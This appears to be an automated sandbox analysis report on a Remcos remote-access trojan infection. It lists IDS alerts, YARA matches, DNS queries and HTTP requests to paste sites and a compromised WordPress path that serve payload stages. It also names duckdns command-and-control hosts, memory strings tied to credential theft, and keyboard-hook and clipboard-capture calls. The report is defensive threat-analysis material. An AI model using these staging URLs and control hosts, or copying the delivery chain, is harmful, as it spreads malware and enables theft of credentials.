                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49775 -> 172.111.213.72:3981
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 128.201.75.197:80 -> 192.168.2.5:49711
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 128.201.75.197:80 -> 192.168.2.5:49711
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49706 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49709 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49728 -> 188.114.97.3:443
                      Source: Malware configuration extractorURLs: janbours92harbu03.duckdns.org
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: pastebin.com
                      Source: global trafficTCP traffic: 191.252.83.213 ports 1,60613,2,60656,60381,21
                      Source: unknownDNS query: name: janbours92harbu04.duckdns.org
                      Source: unknownDNS query: name: janbours92harbu03.duckdns.org
                      Source: Yara matchFile source: 4.2.powershell.exe.12fc53b9a00.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286bf97d858.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c71844dd88.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c40e52f4b8.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.5:49705 -> 191.252.83.213:60656
                      Source: global trafficHTTP traffic detected: GET /d/2A2GE/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/oWGnC/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/qYZ64/0 HTTP/1.1Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cognac/smsinc.txt HTTP/1.1Host: sbelegi.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: LocawebServicosdeInternetSABR LocawebServicosdeInternetSABR
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49787 -> 178.237.33.50:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 188.114.97.3:443
                      Source: unknownFTP traffic detected: 191.252.83.213:21 -> 192.168.2.5:49704 220 "Servico de FTP da Locaweb"
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,20_2_0041B411
                      Source: global trafficHTTP traffic detected: GET /d/2A2GE/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/oWGnC/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/qYZ64/0 HTTP/1.1Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cognac/smsinc.txt HTTP/1.1Host: sbelegi.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: AddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: AddInProcess32.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: ftp.desckvbrat.com.br
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: sbelegi.com.br
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: janbours92harbu03.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: janbours92harbu04.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: powershell.exe, 00000006.00000002.2940383088.0000024FCCD37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://desckvbrat.com.br
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.desckvbrat.com.br
                      Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: powershell.exe, 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: powershell.exe, 00000004.00000002.2537350188.0000012FD4FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2802400106.0000015045F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC69EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                      Source: powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC550A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbelegi.com.br
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbelegi.com.br/wp-content/plugins/cognac/H#
                      Source: powershell.exe, 00000002.00000002.2917323409.0000021E2491B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbelegi.com.br/wp-content/plugins/cognac/smsinc.txt
                      Source: powershell.exe, 00000005.00000002.2300798084.0000015036132000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.2917323409.0000021E23C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2300798084.0000015035F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2238540317.00000260B1B7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000005.00000002.2300798084.0000015036132000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: AddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: AddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: powershell.exe, 00000002.00000002.2917323409.0000021E23C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: powershell.exe, 00000002.00000002.2917323409.0000021E23C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2300798084.0000015035F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2304620541.0000024FB4941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2238540317.00000260B1BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2238540317.00000260B1BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC556D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: AddInProcess32.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: powershell.exe, 00000004.00000002.2537350188.0000012FD4FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2802400106.0000015045F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2830818460.0000024FC49B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC667D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC69D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC667D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/2A2GE/0
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC667D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/2A2GE/0P
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC69D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/oWGnC/0
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC69D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/oWGnC/0P
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC5559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/qYZ64/0
                      Source: powershell.exe, 0000000D.00000002.2326336524.000001C40E6B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2326336524.000001C40E4A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 0000000D.00000002.2326336524.000001C40E4A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, AddInProcess32.exe, 00000018.00000002.2392226632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: AddInProcess32.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC54E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC5341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC54A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC555F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49819 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000020_2_0040A2F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004168FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_004098E2
